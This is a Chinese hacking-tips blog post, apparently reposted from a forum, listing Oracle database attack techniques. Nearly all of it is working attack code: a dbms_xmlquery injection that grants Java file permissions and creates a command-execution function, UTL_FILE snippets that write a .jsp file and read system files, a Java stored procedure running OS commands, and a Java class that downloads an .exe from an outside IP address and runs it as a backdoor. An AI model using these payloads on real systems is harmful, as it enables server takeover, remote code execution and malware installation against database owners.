记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

oracle的一些小姿势

2020-09-20 08:55


1.执行系统命令
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<ALL FILES>>'''',''''EXECUTE'''');end;''commit;end;') from dual;

select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function QaxRunCMD2(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD((java.lang.String) return String''''; '';commit;end;') from dual;

select QaxRunCMD2('whoami') from dual;
2.oracl写文件
create or replace directory IST0_DIR as 'C:\';

grant read, write on directory IST0_DIR to 用户;

declare

isto_file utl_file.file_type;

begin

isto_file := utl_file.fopen('IST0_DIR', 'kj021320.jsp', 'W');

utl_file.fflush(isto_file);

utl_file.fclose(isto_file);

end;
3.oracl读文件
create or replace directory IST0_DIR as 'C:\Windows\System32\zh-CN\';

declare

isto_file utl_file.file_type;

fp_buffer RAW(32767);

begin

isto_file := utl_file.fopen('IST0_DIR', 'winver.exe.mui', 'R',32767); --操作系统版本信息

utl_file.get_raw (isto_file , fp_buffer,32767 );

dbms_output.put_line(fp_buffer);

utl_file.fclose(isto_file);

end;
4.oracle plsqldev.exe 执行命令-->原理执行java代码调用系统命令,界面画f8
4.1创建java源码

create or replace and compile java source named Test as

import java.io.*;

public class Test

{

public static void entry(String cmd) throws Exception

{

Process process = Runtime.getRuntime().exec(cmd);

InputStream in = process.getInputStream();

BufferedReader br = new BufferedReader(new InputStreamReader(in));

String line = br.readLine();

while(line!=null) {

System.out.println(line);

line = br.readLine();

}

}

}
4.2.创建存储过程


create or replace procedure cmd(p_str in varchar2)
as language java
name 'Test.entry(java.lang.String)';

4.3设置长度pl sql pluse
set serveroutput on size 5000;

call dbms_java.set_output(5000);

4.4运行存储过程
EXEC cmd('whoami'); 
4.5直接下载执行后门
import java.lang.*;

import java.io.*;

import java.net.*;

import java.util.*;



public class Hello

{

public static void entry() throws Exception

//public static void main(String[] args) throws Exception

{

try

{

String url="http://1.1.1.1:4321/xxx.exe";

String token="xxxxxxxxxxxxxxxxxxxxxxxxx";

Hello.downLoadFromUrl(url,"xxx.exe","c:\\",token);

System.out.println("下载完成");

Process process = Runtime.getRuntime().exec("cmd /k c:\\xxx.exe");

} catch (java.io.IOException e) {

System.out.println(e);

}



}





public static void downLoadFromUrl(String urlStr,String fileName,String savePath,String toekn) throws IOException

{

URL url = new URL(urlStr);

HttpURLConnection conn = (HttpURLConnection)url.openConnection();

conn.setConnectTimeout(3*1000);

conn.setRequestProperty("User-Agent", "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)");

InputStream inputStream = conn.getInputStream();

byte[] getData = readInputStream(inputStream);

File saveDir = new File(savePath);

if(!saveDir.exists()){

saveDir.mkdir();

}

File file = new File(saveDir+File.separator+fileName);

FileOutputStream fos = new FileOutputStream(file);

fos.write(getData);

if(fos!=null){

fos.close();

}

if(inputStream!=null){

inputStream.close();

}

System.out.println("info:"+url+" download success");



}



public static byte[] readInputStream(InputStream inputStream) throws IOException

{

byte[] buffer = new byte[1024];

int len = 0;

ByteArrayOutputStream bos = new ByteArrayOutputStream();

while((len = inputStream.read(buffer)) != -1) {

bos.write(buffer, 0, len);

}

bos.close();

return bos.toByteArray();

}

}
TCV=666

知识来源: https://www.t00ls.net/articles-57941.html

阅读:200790 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“oracle的一些小姿势”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

↓赞助商 🙇🧎

标签云 ☁